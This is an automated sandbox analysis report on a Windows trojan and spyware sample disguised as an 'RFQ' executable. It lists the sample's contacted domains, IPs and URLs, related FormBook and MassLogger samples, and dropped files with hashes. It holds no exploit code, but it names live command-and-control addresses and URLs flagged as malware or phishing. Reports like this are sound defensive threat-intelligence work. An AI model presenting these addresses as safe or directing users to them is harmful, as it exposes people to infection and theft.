                http://18.141.10.107/punqdgkybi0%Avira URL Cloudsafe
                http://18.141.10.107/=0%Avira URL Cloudsafe
                https://shksj.sdnasj.nduau.cn/123.html0%Avira URL Cloudsafe
                http://www.d48dk.top/9ffw/0%Avira URL Cloudsafe
                http://18.141.10.107/punqdgkybiS0%Avira URL Cloudsafe
                http://18.141.10.107/punqdgkybi-80%Avira URL Cloudsafe
                http://www.duwixushx.xyz100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                webredir.vip.gandi.net
                217.70.184.50
                truefalse
                  high
                  www.snyp.shop
                  13.248.169.48
                  truetrue
                    unknown
                    d48dk.top
                    154.23.184.207
                    truetrue
                      unknown
                      www.8312zcksnu.bond
                      38.165.29.234
                      truetrue
                        unknown
                        ssbzmoy.biz
                        18.141.10.107
                        truefalse
                          high
                          fwiwk.biz
                          172.234.222.143
                          truefalse
                            high
                            pywolwnvd.biz
                            54.244.188.177
                            truefalse
                              high
                              www.duwixushx.xyz
                              156.251.17.224
                              truefalse
                                high
                                www.sunnyz.store
                                unknown
                                unknownfalse
                                  unknown
                                  www.d48dk.top
                                  unknown
                                  unknownfalse
                                    unknown
                                    NameMaliciousAntivirus DetectionReputation
                                    http://pywolwnvd.biz/jigtxfalse
                                      high
                                      http://ssbzmoy.biz/punqdgkybifalse
                                        high
                                        http://www.snyp.shop/4nyz/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://cvgrf.biz/rtjcyfalse
                                          high
                                          http://www.8312zcksnu.bond/d3gs/true
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://ssbzmoy.biz/sfalse
                                            high
                                            http://knjghuig.biz/rrxdfrjngeyagfalse
                                              high
                                              http://vcddkls.biz/gepvpveyhkiwwmjfalse
                                                high
                                                http://www.duwixushx.xyz/u11p/true
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://pywolwnvd.biz/yjbljodlunyhfalse
                                                  high
                                                  http://www.d48dk.top/9ffw/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://duckduckgo.com/chrome_newtabchoice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://duckduckgo.com/ac/?q=choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://pywolwnvd.biz/RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://18.141.10.107:80/punqdgkybisRFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://whois.gandi.net/en/results?search=sunnyz.storechoice.exe, 00000010.00000002.2752942454.0000000004E14000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000010.00000002.2754801840.0000000007100000.00000004.00000800.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751956127.0000000003154000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.2285612924.00000000012C4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.gandi.net/en/domainchoice.exe, 00000010.00000002.2752942454.0000000004E14000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000010.00000002.2754801840.0000000007100000.00000004.00000800.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751956127.0000000003154000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.2285612924.00000000012C4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                              high
                                                              http://54.244.188.177/hRFQ _ Virtue 054451000085.exe, 00000000.00000003.1526907938.0000000000CD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: phishing
                                                              unknown
                                                              https://www.ecosia.org/newtab/choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://54.244.188.177/yjbljodlunyhRFQ _ Virtue 054451000085.exe, 00000000.00000003.1526907938.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541530686.0000000000D04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://18.141.10.107/RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://18.141.10.107/=RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://ac.ecosia.org/autocomplete?q=choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://54.244.188.177/yjbljodlunyhsTRFQ _ Virtue 054451000085.exe, 00000000.00000002.1541530686.0000000000D04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://hm.baidu.com/hm.js?74a9aceb7cac25dafa7a0b15cd8b5c9dchoice.exe, 00000010.00000002.2752942454.0000000005138000.00000004.10000000.00040000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751956127.0000000003478000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      high
                                                                      https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilithelevation_service.exe.0.drfalse
                                                                        high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchchoice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://18.141.10.107/punqdgkybiRFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp, RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541665459.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://shksj.sdnasj.nduau.cn/123.htmlchoice.exe, 00000010.00000002.2752942454.0000000005138000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000010.00000002.2754801840.0000000007100000.00000004.00000800.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751956127.0000000003478000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://18.141.10.107/punqdgkybiSRFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://18.141.10.107/punqdgkybi-8RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541665459.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.duwixushx.xyziavbXasnTxCeiF.exe, 00000011.00000002.2753929696.000000000520D000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            unknown
                                                                            https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffelevation_service.exe.0.drfalse
                                                                              high
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              13.248.169.48
                                                                              www.snyp.shopUnited States
                                                                              16509AMAZON-02UStrue
                                                                              156.251.17.224
                                                                              www.duwixushx.xyzSeychelles
                                                                              132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                                              38.165.29.234
                                                                              www.8312zcksnu.bondUnited States
                                                                              174COGENT-174UStrue
                                                                              54.244.188.177
                                                                              pywolwnvd.bizUnited States
                                                                              16509AMAZON-02USfalse
                                                                              217.70.184.50
                                                                              webredir.vip.gandi.netFrance
                                                                              29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRfalse
                                                                              154.23.184.207
                                                                              d48dk.topUnited States
                                                                              174COGENT-174UStrue
                                                                              18.141.10.107
                                                                              ssbzmoy.bizUnited States
                                                                              16509AMAZON-02USfalse
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1571270
                                                                              Start date and time:2024-12-09 08:30:15 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 9m 55s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:16
                                                                              Number of new started drivers analysed:3
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:2
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:RFQ _ Virtue 054451000085.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.spre.troj.spyw.expl.evad.winEXE@12/13@10/7
                                                                              EGA Information:
                                                                              • Successful, ratio: 80%
                                                                              HCA Information:
                                                                              • Successful, ratio: 65%
                                                                              • Number of executed functions: 62
                                                                              • Number of non-executed functions: 248
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                              • Excluded domains from analysis (whitelisted): przvgke.biz, ww7.przvgke.biz, zlenh.biz, slscr.update.microsoft.com, otelrules.azureedge.net, knjghuig.biz, vjaxhpbji.biz, ctldl.windowsupdate.com, ifsaia.biz, uhxqin.biz, fe3cr.delivery.mp.microsoft.com, ww12.przvgke.biz, cvgrf.biz, ww99.przvgke.biz, lpuegx.biz, saytjshyf.biz, xlfhhhm.biz, vcddkls.biz, npukfztj.biz, anpmnmxo.biz
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                              TimeTypeDescription
                                                                              02:31:40API Interceptor1x Sleep call for process: RFQ _ Virtue 054451000085.exe modified
                                                                              02:32:59API Interceptor732370x Sleep call for process: choice.exe modified
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              13.248.169.48NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • www.krshop.shop/5p01/
                                                                              DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                                              • www.egyshare.xyz/440l/
                                                                              purchase order.exeGet hashmaliciousFormBookBrowse
                                                                              • www.aktmarket.xyz/wb7v/
                                                                              SRT68.exeGet hashmaliciousFormBookBrowse
                                                                              • www.avalanchefi.xyz/vxa5/
                                                                              ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                              • www.remedies.pro/4azw/
                                                                              Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • www.optimismbank.xyz/98j3/?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs
                                                                              Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                              • www.smartgov.shop/1cwp/
                                                                              SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                              • www.egyshare.xyz/440l/
                                                                              attached invoice.exeGet hashmaliciousFormBookBrowse
                                                                              • www.aktmarket.xyz/wb7v/
                                                                              YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                              • www.tals.xyz/k1td/
                                                                              156.251.17.224ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                              • www.duwixushx.xyz/fyc8/
                                                                              PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                              • www.duwixushx.xyz/q0vk/
                                                                              OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                              • www.duwixushx.xyz/q0vk/
                                                                              DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                              • www.duwixushx.xyz/bmve/?Wno=a0qDq&KV=Rsosln+CouPFD70pouDpcL8MGxlXnptR0Qz9VzezY2yTYUIF1+nb00CRzlZGPtlDISGdoNhQK1cGxL7iAKAdT88wJdzRXyyanezdQrBbCEm548OmpMr0744=
                                                                              54.244.188.177OgkJOmobY7.exeGet hashmaliciousFormBookBrowse
                                                                              • pywolwnvd.biz/hemfkj
                                                                              Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                              • pywolwnvd.biz/nwqf
                                                                              Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                              • cvgrf.biz/yqmdwhskkjhif
                                                                              invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                              • lrxdmhrr.biz/tgcwttfqletfhyq
                                                                              Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                              • rynmcq.biz/msoqwwrwyts
                                                                              C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                              • rynmcq.biz/qqnj
                                                                              PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                              • pywolwnvd.biz/ksmybghbmbq
                                                                              IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                              • lrxdmhrr.biz/wt
                                                                              Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                              • rynmcq.biz/qwi
                                                                              Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                              • ecxbwt.biz/brgveksk
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              webredir.vip.gandi.netQUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                                              • 217.70.184.50
                                                                              PO# 81136575.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                              • 217.70.184.50
                                                                              Order No 24.exeGet hashmaliciousFormBookBrowse
                                                                              • 217.70.184.50
                                                                              RFQ.exeGet hashmaliciousFormBookBrowse
                                                                              • 217.70.184.50
                                                                              statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                              • 217.70.184.50
                                                                              RFQ.exeGet hashmaliciousFormBookBrowse
                                                                              • 217.70.184.50
                                                                              RFQ.exeGet hashmaliciousFormBookBrowse
                                                                              • 217.70.184.50
                                                                              XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                              • 217.70.184.50
                                                                              SWIFT.exeGet hashmaliciousFormBookBrowse
                                                                              • 217.70.184.50
                                                                              #10302024.exeGet hashmaliciousFormBookBrowse
                                                                              • 217.70.184.50
                                                                              ssbzmoy.bizZiraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                              • 18.141.10.107
                                                                              RFQ_PO N89397-GM7287-Order.bat.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                              • 18.141.10.107
                                                                              Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                              • 18.141.10.107
                                                                              invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                              • 18.141.10.107
                                                                              Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                              • 18.141.10.107
                                                                              C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                              • 18.141.10.107
                                                                              PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                              • 18.141.10.107
                                                                              IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                              • 18.141.10.107
                                                                              Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                              • 18.141.10.107
                                                                              Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                              • 18.141.10.107
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              COGENT-174USjew.mips.elfGet hashmaliciousUnknownBrowse
                                                                              • 38.181.75.57
                                                                              jew.ppc.elfGet hashmaliciousUnknownBrowse
                                                                              • 38.10.205.247
                                                                              sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                              • 38.58.80.48
                                                                              sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                              • 154.62.162.19
                                                                              sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                              • 38.1.0.131
                                                                              sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                              • 38.83.59.58
                                                                              meerkat.arm5.elfGet hashmaliciousMiraiBrowse
                                                                              • 38.138.245.245
                                                                              meerkat.x86.elfGet hashmaliciousMiraiBrowse
                                                                              • 154.12.143.89
                                                                              SpyHunter-5.18-5-6605-Installer.exeGet hashmaliciousUnknownBrowse
                                                                              • 143.244.49.179
                                                                              arm5.elfGet hashmaliciousUnknownBrowse
                                                                              • 206.3.145.188
                                                                              AMAZON-02USboatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                                              • 54.171.230.55
                                                                              boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                              • 54.171.230.55
                                                                              boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                                                                              • 54.171.230.55
                                                                              cllmxIZWcQ.lnkGet hashmaliciousUnknownBrowse
                                                                              • 3.5.167.250
                                                                              qhjKN40R2Q.lnkGet hashmaliciousUnknownBrowse
                                                                              • 52.95.134.150
                                                                              NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • 13.248.169.48
                                                                              jew.arm5.elfGet hashmaliciousMiraiBrowse
                                                                              • 54.171.230.55
                                                                              jew.m68k.elfGet hashmaliciousUnknownBrowse
                                                                              • 18.162.175.118
                                                                              jew.mips.elfGet hashmaliciousUnknownBrowse
                                                                              • 18.241.248.28
                                                                              jew.ppc.elfGet hashmaliciousUnknownBrowse
                                                                              • 13.122.1.68
                                                                              POWERLINE-AS-APPOWERLINEDATACENTERHKDHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                              • 154.215.72.110
                                                                              DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                              • 154.215.72.110
                                                                              nshsh4.elfGet hashmaliciousMiraiBrowse
                                                                              • 156.251.3.5
                                                                              i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                              • 156.251.7.145
                                                                              armv4l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                              • 156.244.234.130
                                                                              ex86.elfGet hashmaliciousMiraiBrowse
                                                                              • 156.244.234.110
                                                                              armv6l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                              • 156.242.206.57
                                                                              mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                              • 156.251.7.126
                                                                              ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                              • 156.251.17.224
                                                                              PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                              • 156.251.17.224
                                                                              No context
                                                                              No context
                                                                              Process:C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1658880
                                                                              Entropy (8bit):4.312994353570942
                                                                              Encrypted:false
                                                                              SSDEEP:24576:lxGBcmlqVg9N9JMlDlfjRiVuVsWt5MJMs:LGy+2gFIDRRAubt5M
                                                                              MD5:785A052E614E12F8A62CD368B4273290
                                                                              SHA1:96348E8B295953806D6D1C3AC11620D6359DD0FD
                                                                              SHA-256:E9322F5BAD853B73C135D17094443BADE37556944ABB31D37B20E58488CFB880
                                                                              SHA-512:E0DE851739BC2FC3F0A006B621700183AFE9C18F15DE2571ECB80BADDD6629EE44487605597E880575F55393F72C7A689348D5096A3BDCF0CB947A59905860B7
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@.........................................................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...............`..............@...........................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                              Category:modified
                                                                              Size (bytes):2935808
                                                                              Entropy (8bit):7.304427912540143
                                                                              Encrypted:false
                                                                              SSDEEP:49152:UhDdVrQ95RW0Y9HyWQXE/09Val0GIgFIDRRAubt5MDgFIDRRAubt5M:UhHYWLHyWKuUffUf
                                                                              MD5:4A75CEF77A853151229868A922272694
                                                                              SHA1:E54D2173247289E4EE513F8B7FE170CBC180091D
                                                                              SHA-256:D85563C197D2E9C2B0F9C18FAF262D197C121D240789F3A3023A11CBD300D413
                                                                              SHA-512:57A921D571CF1741C9AF8EC20613DEE69C41FB1287399C9055748DBCD0647A30FD16EAEB5E79B9EBD87DBA3198BBACA7EE8D62DF2FA9F2A304BF5EDFF76879F7
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................@.......F-... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):3141
                                                                              Entropy (8bit):4.85793594555096
                                                                              Encrypted:false
                                                                              SSDEEP:24:l2dwQrbeP4BrRzRWtFgRWmIFW1w3JuPhRWqFwvRxRWlbFRW07F9vWYRWqNFRq4+0:4WCRodm3qbZq4Fq8vtnSD
                                                                              MD5:5E9C7BA14306F00A09F7A8EB122E3D13
                                                                              SHA1:A29B95AA46C6C72DDCF5F61FD04807649A8C9943
                                                                              SHA-256:FF31D37DCE343DFFDFC6DEF1ACE1EA247BDC0F2C01AC176A1304608D434A91B3
                                                                              SHA-512:FF1C59B73D41686A1691F164D56395703D1CFD9A513BDAA00A099C6D846CA8B4DEC08A9F2D2093D244BC9B2C1E0FEFF9973AAA2D556C2B53F18A2B39C869E26A
                                                                              Malicious:false
                                                                              Preview:2024-12-09 02:31:42-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-12-09 02:31:42-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-12-09 02:31:42-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-12-09 02:31:42-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-12-09 02:31:42-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-12-09 02:31:42-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-12-09 02:31:42-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-12-09 02:31:42-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-12-09 02:31:42-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-12-09 02:31:42-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-12-09 02:31:42-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-12-09 02:31:4
                                                                              Process:C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2370560
                                                                              Entropy (8bit):7.031534747100036
                                                                              Encrypted:false
                                                                              SSDEEP:49152:/AMsOu3JfCIGnZuTodRFYKBrFxbWpOgFIDRRAubt5M:/AMa38ZuTSQUf
                                                                              MD5:AD10BDCC2029A8A94C27D7B63CE8E80D
                                                                              SHA1:ABD3C327E6369B94540F922BFD008176A13F1DD0
                                                                              SHA-256:D8ED79C7F503C488DA4148776C3A9E89D1FB1E810DF8751851D7F9AE3F0ECEB0
                                                                              SHA-512:24FADE3675419245D90246758A384E52244E6EAFE2AEF27377C026DB3A7868A1EFD26B1DB5E58B5DC915824B8AA3EF76F67820DD0C35CABD81A676EFD5C17A08
                                                                              Malicious:true
                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%.....*.%... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................
                                                                              Process:C:\Windows\SysWOW64\choice.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                              Category:modified
                                                                              Size (bytes):196608
                                                                              Entropy (8bit):1.1215420383712111
                                                                              Encrypted:false
                                                                              SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                              MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                              SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                              SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                              SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):288768
                                                                              Entropy (8bit):7.994271917855947
                                                                              Encrypted:true
                                                                              SSDEEP:6144:mntWSXlPqqOC/jw8jxCI0jIXLKNq2p7iwZbtdH6ItEZR2A:jS1PqqOC7w8jCjIXOY87iUvagYR5
                                                                              MD5:E718A5652D2AB4800966589D11B88460
                                                                              SHA1:10C93CAF35DD75589C1A703E0C41C23D93F0C4D8
                                                                              SHA-256:A3AC7B5CB62E86D7804C24A82CE97B7CBBFDA0E0A9B64C50845BCF3A14CDDD97
                                                                              SHA-512:2C164D375457E187968098AD5D61206E117B2EFC2E0655E6C79F5B7A2AD44C065E02AA18A1CC05D7B5F8945D9C22457F9078BDB90594F97133BA99F88B71105F
                                                                              Malicious:false
